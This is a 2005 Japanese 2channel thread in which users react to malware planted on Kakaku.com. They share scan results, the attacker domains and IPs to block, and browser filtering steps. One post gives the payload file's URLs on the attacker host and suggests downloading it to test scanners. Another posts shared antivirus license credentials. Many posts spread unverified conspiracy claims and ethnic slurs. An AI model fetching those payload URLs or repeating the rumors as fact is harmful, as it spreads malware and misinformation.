価格に登録してた人が"真理"メール来るようになったと言う報告が多数あり。
メール流出はやっぱり別件か?
ファックJPな香具師らと業者がからんでるなんてことがあるのか?

580 :名無しさん@5周年:2005/05/16(月) 14:31:28 ID:WS9UeFKB
>>532
コントロールセンターのNOD32選んだら、
詳細の検査ってのがあるよ。

581 :名無しさん@5周年:2005/05/16(月) 14:31:45 ID:b5CfFZqB
.cssでファイル検索したが三月以降はないのだが
どんなもんかね?


582 :名無しさん@5周年:2005/05/16(月) 14:32:07 ID:jSlzn8oA
今一番喜んでる奴
中国人より日本の家電やハイテク業界(www

583 :名無しさん@5周年:2005/05/16(月) 14:32:49 ID:Dh+TG1IF
>>578
つい先日、ひろゆきがTOPページにLDブログへのリンクを埋め込んでて
祭になったの知らない?

584 :名無しさん@5周年:2005/05/16(月) 14:33:22 ID:EnO2k0Qo
.cssで検索したらかちゅのログが出てきた

585 :名無しさん@5周年:2005/05/16(月) 14:33:25 ID:VBVi6jmn
>>582
損したのは価格だけで、実は日本の利益を増大させちゃった中国人ハッカーが哀れだ

まあしょっぴいて欲しいけどね

586 :名無しさん@5周年:2005/05/16(月) 14:33:53 ID:PVVo30Qo
>>578
最近livedoorのブログの事件あったから
それでほんとに隠しリンクされてるかみたぐらいかなぁ

587 :名無しさん@5周年:2005/05/16(月) 14:33:53 ID:qvsDUZN1
ってか、みなさん仕事は?

588 :名無しさん@5周年:2005/05/16(月) 14:34:10 ID:2gTN39FL
まあ、恨んでる奴は多いだろうからなあ。
メーカーも、ユーザーも。

589 :名無しさん@5周年:2005/05/16(月) 14:34:11 ID:gyhoJ9jr
>>582
しかし正直バッタ屋とか、クレジット枠を換金化とか、そういうグレーなところはマジ切れじゃないの?
死活問題だろうしな。

590 :名無しさん@5周年:2005/05/16(月) 14:34:38 ID:M539VtYo
>>581
大丈夫じゃない?
URL踏んでくらった俺は.cssで見つけたよ。

591 :名無しさん@5周年:2005/05/16(月) 14:35:55 ID:p4pL2r/X
感染してなかったよ。(;^_^A
よかったよかった。火鳥最高。ヽ(´ー`)ノ

592 :名無しさん@5周年:2005/05/16(月) 14:36:12 ID:croT0bAw
NOD32でウィルス削除はしたけど安心していいのものか。
やっぱ再インストールすべきだろうか?

593 :名無しさん@5周年:2005/05/16(月) 14:36:41 ID:VAQRnEL6
>>591
まだFirebird使ってるのかよw

594 :名無しさん@5周年:2005/05/16(月) 14:37:14 ID:F2LnTQfV
AVGが対応するまでほうっておこう

595 :名無しさん@5周年:2005/05/16(月) 14:37:38 ID:NcJDEEA7
BitDefenderFreeEdition v7.2によるscan結果
Moved 1
Suspect 1
I/O errors 4
他はゼロ
これって感染してるの?大丈夫なの?
教えて下さい。


596 :名無しさん@5周年:2005/05/16(月) 14:37:50 ID:1XbR7vFD
「.css」 でCドライブの過去1週間以内に変更されたファイルを検索して、出てこなかったらおk?

597 :名無しさん@5周年:2005/05/16(月) 14:37:54 ID:3meUWQjb
ネスケで閲覧した俺、一応NOD落としてスキャン。
もちろん、未感染、ただ、昔、感染したファイルがそのままあるはずなんだが
それを発見できないぞ。NOD

598 :名無しさん@5周年:2005/05/16(月) 14:38:20 ID:wmN3AZ3x
火蛇最高。ヽ(´ー`)ノ

599 :名無しさん@5周年:2005/05/16(月) 14:38:27 ID:b5CfFZqB
>>590
そか
一応ノートンさんの対応を待ってみるか

600 :名無しさん@5周年:2005/05/16(月) 14:38:47 ID:mm+IKCOE
>>595
そのツールよく知らんけど1件駆除されたんじゃないの?
Suspect1件っていうのが気になるけど

601 :名無しさん@5周年:2005/05/16(月) 14:39:31 ID:69cHiIuk
 Identified viruses → ウイルス確認数   
 
 Total virus bodies → 発見ウイルス数
 
 Disinfected → ウイルス感染ファイルを駆除済み
 
 Deleted → ウイルス感染ファイルを削除済み
 
 Copied → ウイルス感染ファイルを隔離フォルダにコピー済み

 Moved → ウイルス感染ファイルを隔離フォルダに移動済み
 
 Renamed → ウイルス感染ファイルの名前を改名済み

 Warnings → 警告
 
 Suspect → ウイルス感染の疑いがあるファイル
 
 I/O errors → 読み取り不可

602 :名無しさん@5周年:2005/05/16(月) 14:39:48 ID:s53gXUDR
>>583
知ってるが、面倒なので見とらん

603 :暫定まとめサイト作成中の人:2005/05/16(月) 14:40:13 ID:1OIbpppz
372 名前:名無しさん@お腹いっぱい。[] 投稿日:2005/05/16(月) 14:35:46
http://www.itmedia.co.jp/news/articles/0505/16/news022.html
 その他のウイルス対策ソフトでの対応については、まだ確認中。
トレンドマイクロによれば「この件に関して問い合わせを受けた
ユーザーの多くで、『Troj_Delf.RM』という名称で検出されたとい
情報が入っているが、まだ確定できていない」といい、引き続き
検証を進めているという。

 14時20分追記:トレンドマイクロによると、このTrojan_Delf.RMが、
価格.comでばら撒かれたウイルスの1つであることが確認された。
パターンファイル2.631.00で対応済みだ。ほかのウイルスについては
調査を継続するという。

604 :名無しさん@5周年:2005/05/16(月) 14:40:18 ID:kN8Zj5+h
職場のPCに感染した俺の尻はバックファイヤー。

605 :名無しさん@5周年:2005/05/16(月) 14:40:58 ID:kugVebWe
>>597
ワロス
NOD32、たまに他のAnti-Virus ソフトで発見できないウイルスを検出するけど
検出率自体は低いよねえ

606 :名無しさん@5周年:2005/05/16(月) 14:41:38 ID:jIIKsYzd
>>563
俺も。なんか途中で終了したっぽい。

607 :名無しさん@5周年:2005/05/16(月) 14:41:49 ID:fyeceqCr
BitDefenderは本体落としてスキャンしないと意味無い?
今、オンラインスキャンしてるんだけど

608 :名無しさん@5周年:2005/05/16(月) 14:43:24 ID:FxXRoT0/
問題のcssファイルって、cドライブのどこにあるの?
Temporary Internet Filesフォルダ?Windowsフォルダ?

609 :名無しさん@5周年:2005/05/16(月) 14:43:39 ID:FExMH/oV
初心者でノートン入れてるのですが、つまり
木曜日までネットに繋いじゃいけないってことですか・・

どうしたらいいの・・(´Д⊂グスン

610 :名無しさん@5周年:2005/05/16(月) 14:44:18 ID:LisxHFxq
これって、あるPCが感染したら、
LAN内の他のPCにも感染するのか??

ウィルスの情報少なすぎ。orz..

611 :名無しさん@5周年:2005/05/16(月) 14:44:46 ID:Ef3l0CvS
先月HDD壊れたけどHDD買いにいくの面倒でlinuxknoppixでネットしてる俺はかちぐみ

612 :名無しさん@5周年:2005/05/16(月) 14:45:41 ID:3meUWQjb
>>609
そんな あなたにネッスエスケープ。とりあえずDLすれば。
ちょっと使い勝手悪いけど、IEが万が一感染してても無問題。

613 :名無しさん@5周年:2005/05/16(月) 14:45:44 ID:b5CfFZqB
>>609
シマンテックのHPに行って見るといい

614 :名無しさん@5周年:2005/05/16(月) 14:46:46 ID:7G2uHeJD
もうお前らのPCは感染してるからLANケーブル引っこ抜け。

615 :名無しさん@5周年:2005/05/16(月) 14:46:56 ID:kCci84P+
>>609
木曜日までネットに繋がない

616 :名無しさん@5周年:2005/05/16(月) 14:46:57 ID:Dh+TG1IF
>>610
このスレの中にも何回も情報出てるし、まとめサイトへのリンクも貼ってあるはず・・・

617 :名無しさん@5周年:2005/05/16(月) 14:47:23 ID:VAQRnEL6
>>612
ネスケよりはFirefoxの方がいいだろ
ネスケ糞杉

618 :名無しさん@5周年:2005/05/16(月) 14:47:47 ID:+rSHBy0g
>>612
逃げてどうするw


619 :名無しさん@5周年:2005/05/16(月) 14:47:55 ID:5DzMGf/I
ぶっちゃけ感染してなかった。
NIS2005+NOD32

SP2+NX bit

620 :名無しさん@5周年:2005/05/16(月) 14:48:25 ID:1XbR7vFD
おいコラ、>>10は完全に信じていいのか?

621 :名無しさん@5周年:2005/05/16(月) 14:49:07 ID:jIAfRopG
情報がスレ内で錯綜してて分からんことになってるけど
ノートンは今現在、手動アップデートすれば価格ウイルスに対応されるの?

622 :名無しさん@5周年:2005/05/16(月) 14:49:57 ID:3meUWQjb
ただ、このニュース、テレビでやらないなぁ。


623 :名無しさん@5周年:2005/05/16(月) 14:50:22 ID:s53gXUDR
>>621
半分ぐらい対応。全部はムリ。

624 :名無しさん@5周年:2005/05/16(月) 14:50:47 ID:qvsDUZN1
で、おまいら仕事は? 家で引きこもってウィルス対策?

625 :名無しさん@5周年:2005/05/16(月) 14:51:05 ID:LI11eXP0
.cssで検索したら2004 11月28日が最新だった。
ここ2週間毎日何回もtopから入ってVGAとビデオカメラ見てた。最近は面倒だから
IEのセキュ中のまま、オミトロンもバイパスのまま。後はバスター対応してくれるまで待つか。

626 :名無しさん@5周年:2005/05/16(月) 14:51:49 ID:STqs7Wit
>603
って事はウィルスバスターは大丈夫って事か?

627 :名無しさん@5周年:2005/05/16(月) 14:52:05 ID:2mQVgLhZ
>>624
ウィルス対策が業務に含まれる人がここで情報収集してても不思議ではない。

628 :名無しさん@5周年:2005/05/16(月) 14:53:02 ID:kZKBhVxU
個人情報保護法的にはこの場合はどういう扱いになるの?

629 :名無しさん@5周年:2005/05/16(月) 14:53:42 ID:3meUWQjb
>>627
たしかに、嘘も本当も混ざってるが
今、この件に関していちばん情報が集まる場所ではあるわな、たぶん。

630 :名無しさん@5周年:2005/05/16(月) 14:53:48 ID:jIAfRopG
>>623
何ー!
じゃ、ノートンAntiVirusでウイルススキャンしても検索されないの?

631 :名無しさん@5周年:2005/05/16(月) 14:54:25 ID:gyhoJ9jr
398 名前:名無しさん@お腹いっぱい。 投稿日:2005/05/16(月) 14:52:16
>>393
しかし何故NOD32だと駆除できるって情報が早い段階で出てきたんだろう。
シマンテックやトレンドマイクロが未だに解明できてないのに、何故下位シェア会社が?
しかも手際よく5月末までのシリアルまで用意?

ぁゃιぃ

632 :名無しさん@5周年:2005/05/16(月) 14:55:03 ID:TQwqZHOM
NOD32なんて聞いたことの無い怪しいソフトなんかインスコしたら
そこらじゅうに足跡残されそうで劇嫌
手動最新パターンのノー飛んで
検出・駆除したって報告は書かれて無いね

633 :名無しさん@5周年:2005/05/16(月) 14:55:04 ID:QYiFpxOp
NODとBDでスキャンしたが、感染してなかったようだ。
普段javascript,activex,java切ってるから助かったみたい。

634 :名無しさん@5周年:2005/05/16(月) 14:55:22 ID:pCBCNS6C
検体出してたら、シマンテックからメール気やした!!

635 :名無しさん@5周年:2005/05/16(月) 14:56:14 ID:0nYCdK2W
>>626
あの問題があったから
行くも地獄 帰るも地獄

636 :名無しさん@5周年:2005/05/16(月) 14:56:15 ID:+rSHBy0g
>>626

マジレスすると「1個は対応してるがほかはまだ分からない」ってことかと


637 :名無しさん@5周年:2005/05/16(月) 14:56:18 ID:M539VtYo
>>630
PWSteal.Lineageってやつだけ反応した。

638 :名無しさん@5周年:2005/05/16(月) 14:56:24 ID:q75C2lEK
とりあえず、F/Wで以下のホストとの通信を遮断しておこう

shtm1.com 61.129.49.163 CN
0x61.com 61.129.51.104 CN
j4sb.com 66.197.130.21 US server2.spoonohost.com

639 :名無しさん@5周年:2005/05/16(月) 14:56:29 ID:GKV4McyJ
>>634
詳しく

640 :名無しさん@5周年:2005/05/16(月) 14:57:16 ID:dGa8STHh
価格こむの社運を賭けた壮絶な自作自演の予感 m9(^Д^)プギャーッ

641 :名無しさん@5周年:2005/05/16(月) 14:58:54 ID:b5CfFZqB
BDのHPにいってオンラインスキャンしたら
別のウイルスに感染してた (;´Д`)
しかもJAVAかよ、ノートンさんが見つけて隔離してる奴を
検出削除してんのかな?

642 :名無しさん@5周年:2005/05/16(月) 14:59:49 ID:WS9UeFKB
>>640
危険すぎw

侵入されただけなら、ダミーに誘い込んで様子を見るとかあるだろうけど、
ウィルス入りに改竄されたまま放置ってのは不味いよな。

643 :名無しさん@5周年:2005/05/16(月) 15:00:23 ID:Dnp+ylCF
ウィルスの方は取りあえずループするだけだから
情報流出の詳細だしてくれないかな>価格。こm

644 :名無しさん@5周年:2005/05/16(月) 15:00:23 ID:pCBCNS6C
>>639

漏れの名前



漏れの名前 様

ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: D:\*********\a02.cssコンピュータ: *****結果: このファイルは次のウィルスに感染しています:
Trojan.Jasbom デベロッパーノート
:
D:\**********\a02.css is non-repairable threat. NAV with the latest rapidrelease definition detects this.
Please delete this file and replace it if neccessary. Please follow the instruction at the end of
this email message to install the latest rapidrelease definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。
今回の提出されたサンプルに含まれる脅威に個別対応した定義ファイルを作成いたしましたので、このメールの末尾に書かれた手順にしたがってインストールしてください。

645 :名無しさん@5周年:2005/05/16(月) 15:00:33 ID:y6ORazKe
NOD32の画面みたが、MATRIXパクリを平気でデザインする会社だろ。
信用できん。

646 :427は神:2005/05/16(月) 15:01:46 ID:y21Zviqj
NOD32アンチウイルス ダウンロード標準版
http://www.vector.co.jp/soft/win95/util/se288813.html
からインストールして以下を入力
>ユーザー名:AV-2544986
>パスワード:viu9hcphek
>
>[有効期限2005年5月31日まで]
最新パターンになります。

647 :名無しさん@5周年:2005/05/16(月) 15:02:55 ID:L1wfRNGK
NHKキタ━━━━━━(゚∀゚)━━━━━━ !!!!

648 :名無しさん@5周年:2005/05/16(月) 15:03:02 ID:3IfcnxDJ
>>1-646
あんたら、もうええわ、社長を呼んで

649 :名無しさん@5周年:2005/05/16(月) 15:03:04 ID:H+R8eAwf
NHKきた

650 :名無しさん@5周年:2005/05/16(月) 15:03:23 ID:VBVi6jmn
>>640
価格じゃなくてNOD32と中共工作員の共謀とかじゃね?

価格は損するのが丸見えじゃん。
価格が気付いた直後にNOD32がうちなら対応してるとか持ちかけたんじゃね?

651 :名無しさん@5周年:2005/05/16(月) 15:04:32 ID:qvsDUZN1
NHKキターって、やっぱみなさん御家?

652 :名無しさん@5周年:2005/05/16(月) 15:05:42 ID:b5CfFZqB
>>651
おういえー


653 :名無しさん@5周年:2005/05/16(月) 15:05:47 ID:VAQRnEL6
ウイルス作者=ウイルス対策ソフト開発者
だよな。やっぱり。

654 :名無しさん@5周年:2005/05/16(月) 15:06:11 ID:zZhz/MhN
価格com訪問者の感染手順を知りたいなぁ
当時どこをどう見たら感染したのか価格comは告知してくれよ

655 :名無しさん@5周年:2005/05/16(月) 15:06:44 ID:3quBa0p3
>>653
だな
それで生計たてていてウハウハ(^▽^)

656 :名無しさん@5周年:2005/05/16(月) 15:06:47 ID:5Bby6kQI
>642
ウィルスについてだけは削除しといたってことは無いか、やっぱ・・・
そこまでアホだとは思いたくはないんだがな・・・

657 :名無しさん@5周年:2005/05/16(月) 15:07:12 ID:eDYUgkJ2
>>553
妄想乙

658 :名無しさん@5周年:2005/05/16(月) 15:07:14 ID:gyhoJ9jr
>>650
こぞってNOD入れた俺達が標的???ヤバス

659 :名無しさん@5周年:2005/05/16(月) 15:08:48 ID:Dh+TG1IF
>>657
セキュリティ板の人が追試して、確認してるよ

660 :名無しさん@5周年:2005/05/16(月) 15:08:55 ID:3quBa0p3
少なくとも、今回のウイルス(AAO)は中華の臭いがする

661 :名無しさん@5周年:2005/05/16(月) 15:09:32 ID:5c1wQb9j
5時からの記者会見でなに言うのかな〜

662 :名無しさん@5周年:2005/05/16(月) 15:10:21 ID:UsuvKokF
BS1きたー

663 :名無しさん@5周年:2005/05/16(月) 15:10:28 ID:gyhoJ9jr
>>661
置き石が原因

664 :名無しさん@5周年:2005/05/16(月) 15:11:24 ID:a3uP+mxH
5月11日に発覚しただけで、11日から仕込まれていたとは何処にもかいてなくね?

665 :名無しさん@5周年:2005/05/16(月) 15:11:31 ID:5DzMGf/I
トレンドマイクロとMSは同じビルに入っている件について

666 :名無しさん@5周年:2005/05/16(月) 15:13:00 ID:KfDwH+am
これで他のアンチウイルスソフトが対応しなかったら
NOD32の売名行為だな。

667 :名無しさん@5周年:2005/05/16(月) 15:13:59 ID:fsvCpk7/
>>659
ネタっぽいの?

668 :634,644:2005/05/16(月) 15:15:01 ID:pCBCNS6C
検体提出してきたシマンテックの個別定義ファイルで

>PSW.Delf.FZの検出能力の確認。
>ttp://www.j4sb.com/count/counter.ap?id=a02
>ttp://www.j4sb.com/count/data/a02.css
>上記URLからa02.cssを保存してこれをスキャン

検出確認です。


669 :名無しさん@5周年:2005/05/16(月) 15:15:09 ID:9uCx7rdK
http://www.bestgate.net/
http://www.coneco.net/
http://www.parts-price.com/
http://www.gaz.co.jp/
http://www.bestprice.net/
http://www.pricer.jp/

670 :名無しさん@5周年:2005/05/16(月) 15:15:11 ID:EWA+h0IT
今回の件で一番に得をしそうなのは、ど〜こだ??
僕はぜったい使わないぞ。アンチウイルスソフトなんて。

671 :名無しさん@5周年:2005/05/16(月) 15:15:51 ID:Nh7Zp6u7
鈴木・・・島男・・・・・・・

672 :名無しが多い:2005/05/16(月) 15:16:04 ID:yOvC7c3X
2種類のウイルスが挙がっていますが、これらの間に連携性とか見られるんですかね。

673 :名無しさん@5周年:2005/05/16(月) 15:16:12 ID:OhO9iZ1O
価格にメール送ったのにシカトされてる件について

674 :名無しさん@5周年:2005/05/16(月) 15:17:34 ID:LisxHFxq
>>668
先生キタ━━━━(゚∀゚)━━━━!!!!!


ってことだよね?

675 :名無しさん@5周年:2005/05/16(月) 15:18:05 ID:966BRihu
>>668


676 :名無しさん@5周年:2005/05/16(月) 15:18:32 ID:eDYUgkJ2
>>668
それはノートン先生のコメントってこと?
定義ファイルは何?

677 :名無しさん@5周年:2005/05/16(月) 15:18:40 ID:gllSMrnk
とりあえずIEで>>255の3つのドメインをフィルタする方法
インターネットオプションにあるコンテンツアドバイザを有効にする
"承認したサイト"に
www.0x61.com
www.shtm1.com
www.j4sb.com
の3つを"しない(N)"ボタンで追加する。
"全般"のユーザーオプションで、"規制されていないサイトを表示する"をチェックOKを
押すとパスワードの入力が求められる。

#以下、超初心者向け
パスワードの入力を求められたら、普段使っていないPWを入力すること。
一文字で充分。ヒントに思いっきり答えを書いておけば忘れても無問題。

・動作を確認したい場合の例
2ちゃんねるTOPの3枚表示されるバナーの一番下はIFRAMEを使っています。
これを利用してコンテンツアドバイザの動作を確認しましょう。
上記と同じ要領でwww.webgate.co.jpを承認しないように追加します。
これで2ちゃんねるTOPを表示してください。
コンテンツアドバイザウインドウが開きますのでキャンセルを押して閉じる。
3枚目のバナーは綺麗に空白になっているはず。

678 :名無しさん@5周年:2005/05/16(月) 15:18:42 ID:KfDwH+am
ホームのボタン押したら、「シュオンガツ!」って聞えるんだが・・・
なんだろ?((((((;゚Д゚))))))ガクガクブルブル

679 :名無しさん@5周年:2005/05/16(月) 15:18:45 ID:Dh+TG1IF
>>667
セキュリティ板より

273 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/16(月) 13:10:15
>>261
試してみた。つうか追試した。本当っぽい。
反日が絡んでる可能性はある。

先月からVIPPERが中国の反日ハカー(いわゆる紅客・黒客)のサイトを
壊滅状態に追いやってたりしてたから、反撃が始まっているのかも。




ということです

680 :名無しさん@5周年:2005/05/16(月) 15:19:07 ID:ECW0jW/C
これを機会に価格コムは
実績の少なくリスクの高い「Mac OS X Server」を導入するんだ!!
ウィルスは少ないと思うよ。たぶん。


怖いな。

681 :名無しさん@5周年:2005/05/16(月) 15:19:44 ID:LfOP3gLc
>>679

うはwww

682 :名無しさん@5周年:2005/05/16(月) 15:20:00 ID:zZhz/MhN
「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」
http://itpro.nikkeibp.co.jp/free/NCC/NEWS/20050516/160876/

683 :名無しさん@5周年:2005/05/16(月) 15:20:05 ID:5d8lov8p
今から全ドライブの詳細検索にはいります しばらく さようなら

684 :名無しさん@5周年:2005/05/16(月) 15:20:18 ID:VAQRnEL6
>>680
いや、普通にUNIX+Apacheでいいだろ

685 :名無しさん@5周年:2005/05/16(月) 15:20:38 ID:ICQ0G/Zq
>>671
アンランドのシマに男と書きます!

686 :連投すまそ、改行を直しました:2005/05/16(月) 15:23:38 ID:gllSMrnk
とりあえずIEで>>255の3つのドメインをフィルタする方法
インターネットオプションにあるコンテンツアドバイザを有効にする
"承認したサイト"に
www.0x61.com
www.shtm1.com
www.j4sb.com
の3つを"しない(N)"ボタンで追加する。
"全般"のユーザーオプションで、"規制されていないサイトを表示する"をチェックする。
OKを押すとパスワードの入力が求められる。

#以下、超初心者向け
パスワードの入力を求められたら、普段使っていないPWを入力すること。
一文字で充分。ヒントに思いっきり答えを書いておけば忘れても無問題。

・動作を確認したい場合の例
2ちゃんねるTOPの3枚表示されるバナーの一番下はIFRAMEを使っています。
これを利用してコンテンツアドバイザの動作を確認しましょう。
上記と同じ要領でwww.webgate.co.jpを承認しないように追加します。
これで2ちゃんねるTOPを表示してください。
コンテンツアドバイザウインドウが開きますのでキャンセルを押して閉じる。
3枚目のバナーは綺麗に空白になっているはず。

687 :名無しさん@5周年:2005/05/16(月) 15:23:59 ID:Gpf+ZSgC
>>682
  _, ._
( ゚ Д゚) カンセンシタケースハナイ……?

(つд⊂)ゴシゴシ
  _, ._
( ゚ Д゚)

688 :名無しさん@5周年:2005/05/16(月) 15:24:21 ID:AJeIgvMP
ひとがウィルス感染してんねんで!!!!11

689 :名無しさん@5周年:2005/05/16(月) 15:24:43 ID:fsvCpk7/
>>649
VIPはチョウゴクの反日サイトに何したの?

690 :644 :2005/05/16(月) 15:25:34 ID:pCBCNS6C
>>674-676
検体出したらシマンテックからメール着て、それにアドレスが書いてあった個別定義ファイルを
ダウンして実行しました。
んで、>>668にあるサイトからダウンしたa02.cssをノートン先生でウィルススキャンしたら検出しました。

もうちょっと待てばIntelligent UpdaterやLiveUpdateでも定義ファイル来ると思う。

691 :名無しさん@5周年:2005/05/16(月) 15:25:43 ID:3KX1VAnU
  _  ∩
( ゚∀゚)彡 周恩来!周恩来!
 ⊂彡


692 :名無しさん@5周年:2005/05/16(月) 15:26:13 ID:rbaj/nT4
あーもうだめだ、価格.COMのせいで自分のPC何も信じられなくなった

msn Hotmailのサインアップ画面なんですけど、
いつもはNISの広告遮断機能でサインアップ情報入力部分のみが表示されるのが、
今日は違う画面が表示された、これって本物のmsn Hotmailのサインアップ画面?

693 :名無しさん@5周年:2005/05/16(月) 15:26:17 ID:eDYUgkJ2
>>690
おお!了解。
対応まじかってことですな。

694 :名無しさん@5周年:2005/05/16(月) 15:26:51 ID:kN8Zj5+h
さぁ、盛り上がってまりりました。

695 :名無しさん@5周年:2005/05/16(月) 15:27:15 ID:OwoOesOU
>>682
>「他社製品のユーザーがどのように対処すれば良いのかは,各ウイルス対策ソフトの
>ベンダーと話し合っている最中。新しい種類のウイルスであるとの情報もある」(広報室)

脊髄反射でNOD32へのリンクを貼ってたのは何だったのかと。

696 :名無しさん@5周年:2005/05/16(月) 15:27:43 ID:5AI+Kcef
あーもうだめだ、価格.COMのせいで自分のPC何も信じられなくなった

Windowsのアクセサリの電卓で1+1を計算させたら
2って表示された、これってあってるの?

697 :名無しさん@5周年:2005/05/16(月) 15:28:21 ID:5DzMGf/I
http://www3.nhk.or.jp/news/2005/05/16/v20050516000085.html

きたぞおまえら

698 :名無しさん@5周年:2005/05/16(月) 15:28:36 ID:NO04v5XB
>>689
日本の教科書の紹介
反日娘のナンパ
一斉友好訪問wwwwww

699 :名無しさん@5周年:2005/05/16(月) 15:30:33 ID:e7Edu3Id
これがテレビで報道されるのは今日いっぱいだろうから、
今日中に犯人が判明しないと、ニュースバリューとしては低くなってしまう。

700 :名無しさん@5周年:2005/05/16(月) 15:30:41 ID:YJB8Y4Uz
>>698
要するにバカでもできることをしただけか、VIPPERは (・∀・)

701 :名無しさん@5周年:2005/05/16(月) 15:30:52 ID:a04pQUCq
NOD3の定義ファイル最新する方法はどこに書いてるの?
教えてくくれ

702 :名無しさん@5周年:2005/05/16(月) 15:31:45 ID:VAQRnEL6
>>700
それがVIPクオリティ

703 :名無しさん@5周年:2005/05/16(月) 15:31:56 ID:0nYCdK2W
>>687
リンク先見ろって

704 :名無しさん@5周年:2005/05/16(月) 15:32:15 ID:q75C2lEK
これと同じパターンだそうだ
http://vegalv50.nyx.bne.jp/misc/security/?id=case-site#jrmt

705 :名無しさん@5周年:2005/05/16(月) 15:33:11 ID:QBl1l8ax
>>696
おいおい! やばいぞそれ。 さっさと再インスコすれ。

706 :名無しさん@5周年:2005/05/16(月) 15:33:27 ID:czYqtSES
>と出てきます。 fuckjpmm とは "Fuck Japanese!" 
>どう見ても反日です。

mmは妹妹の略 ねぇさん 女の子と言う意味です 

707 :名無しさん@5周年:2005/05/16(月) 15:33:36 ID:NO04v5XB
>>700
違う!バカしかできないwwwwwwwwwwwwww

708 :名無しさん@5周年:2005/05/16(月) 15:33:47 ID:YYOIZbyU
>>684
osxのがええG5のな

709 :名無しさん@5周年:2005/05/16(月) 15:34:28 ID:Zpjgmxi+
ここ便利なのにな。
ボロカスに言われてるメーカーの報復か

710 :名無しさん@5周年:2005/05/16(月) 15:34:45 ID:5DzMGf/I
テキスト版はこちら
http://www3.nhk.or.jp/news/2005/05/16/d20050516000085.html

711 :名無しさん@5周年:2005/05/16(月) 15:35:57 ID:VAQRnEL6
>>696
>>416

712 :名無しさん@5周年:2005/05/16(月) 15:36:39 ID:fsvCpk7/
>>706
それだと日本娘メインのエロサイトだな

713 :名無しさん@5周年:2005/05/16(月) 15:37:02 ID:7G2uHeJD
結局何が問題かよくわかってないのか。
価格は囮捜査みたいなことやって、ユーザを危険に晒した。
これは後々問題になってくるよ。

714 :名無しさん@5周年:2005/05/16(月) 15:37:01 ID:Wh24Kxgl
McAfee Part.17
http://pc8.2ch.net/test/read.cgi/sec/1114954465/

517 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/16(月) 15:35:48
価格コムの件、マカに問い合わせた。

現在の定義ファイルでは対応できてないそうだ。
対応のアップデートは、今週木曜の定期アップデートでかかるそうだ。

715 :名無しさん@5周年:2005/05/16(月) 15:37:11 ID:Dnp+ylCF
>>704
>特にYahoo!ではスポンサーサイトの内容審査を行っていないため、危険なサイトが登録されることがあります。
周恩来も強ち的外れではなかったな。この警告の意味があったのかも知れない。

716 :名無しさん@5周年:2005/05/16(月) 15:37:32 ID:YJB8Y4Uz
>>709
確かに、ここが潰れると得をするやつらは、国内にたくさんいる

717 :名無しさん@5周年:2005/05/16(月) 15:37:57 ID:cTqVOA64
NOD32の宣伝ってことはないのかね?

718 :名無しさん@5周年:2005/05/16(月) 15:39:05 ID:VAQRnEL6
>>708
OSX鯖をWEB鯖に使ってるのってAppleくらいじゃないの?

719 :名無しさん@5周年:2005/05/16(月) 15:39:24 ID:97izBkc4
そういえば、この間USNewsのサイトにアクセスしたら激しくトロイ系のウイルスに
感染したけどあれなんだったんだろう?
メジャーなサイトなのに驚いたけど、その後何も報道されてる気配はないし、
怖くてまたアクセスするのいやだし・・・

720 :名無しさん@5周年:2005/05/16(月) 15:39:30 ID:YSNXlFWr
NOD32でもいいんだけど常駐スキャンを使うと重すぎるんだよ。。。
ノートン以上に。

721 :名無しさん@5周年:2005/05/16(月) 15:39:54 ID:QlUSscTI
438 名無しさん@お腹いっぱい。 sage 2005/05/16(月) 15:08:25
Kaspersky,F-Secure,BitDefenderでも検出するようだね。
特別NOD32が速いわけでもないんじゃないの。

722 :名無しさん@5周年:2005/05/16(月) 15:40:17 ID:ECW0jW/C
>>684
>いや、普通にUNIX+Apacheでいいだろ
普通に考えるとそうだわな。

>>708
クソとか言われて叩かれそうだけど

Xserve G5
http://www.apple.com/jp/xserve/

Xserve RAID
http://www.apple.com/jp/xserve/raid/

723 :名無しさん@5周年:2005/05/16(月) 15:40:26 ID:k958SHL8
うちの鯖はアパッチ野球軍でよかった

724 :名無しさん@5周年:2005/05/16(月) 15:40:38 ID:mU3lobsJ
NOD32で検査したけど大丈夫だった。

725 :名無しさん@5周年:2005/05/16(月) 15:40:57 ID:Dh+TG1IF
>>717
宣伝キャンペーンなら普通もっと違う方法取るだろう
中華企業じゃあるまいし、犯罪犯してまでキャンペーンするわけない

726 :名無しさん@5周年:2005/05/16(月) 15:41:00 ID:913Vez4D
また支那か朝鮮の不正アクセスですか

727 :名無しさん@5周年:2005/05/16(月) 15:41:30 ID:PGKaZvuX
Mr.シモムラみたいなパターンか

728 :名無しさん@5周年:2005/05/16(月) 15:42:22 ID:a04pQUCq
頼むNOD3の定義ファイルの最新する方法書いてるとこ教えてくれ〜

729 :名無しさん@5周年:2005/05/16(月) 15:43:11 ID:tgvdFFRo
>>98

クリック募金のみなら大丈夫ぽいね。
漏れもセーフ

730 :名無しさん@5周年:2005/05/16(月) 15:43:23 ID:7G2uHeJD
>>718
国防省が使ってる。ApacheじゃなくてWebStarだけどな。

731 :名無しさん@5周年:2005/05/16(月) 15:43:28 ID:eDYUgkJ2
>>728
「更新」おせ!

732 :名無しさん@5周年:2005/05/16(月) 15:44:33 ID:a04pQUCq
>>731
その釦はどこにあるんだ?

733 :名無しさん@5周年:2005/05/16(月) 15:44:48 ID:gyhoJ9jr
夕方から記者会見ですよ


記者さんに事前資料配付

穐田誉輝
http://japan.cnet.com/2004/sharedmedia/nils2004/02/041206nils_nawada.jpg

http://japan.cnet.com/column/nils2004/story/0,2000052176,20078624,00.htm
http://www.enjyuku.com/k/kp61.htm
http://www.tv-tokyo.co.jp/tobira/050312.html

http://it.nikkei.co.jp/it/column/zensen.cfm?i=20050210c7000c7
デジタル家電はさらなる値下げ努力を――カカクコム穐田誉輝代表取締役CEO

734 :名無しさん@5周年:2005/05/16(月) 15:45:15 ID:xJHit+Rp
ハックした人間を特定するのなんて不可能に近いだろ
ログ残しちゃうようなバカだったら別として

735 :名無しさん@5周年:2005/05/16(月) 15:45:26 ID:zQ987z3O
NODはひょっとしてヒューリスティックっでパターンなしで検出したんで
対応が早かったのかね?

736 :名無しさん@5周年:2005/05/16(月) 15:45:59 ID:dyPIlHLc
bitdefenderスキャンしたら、感染してた…
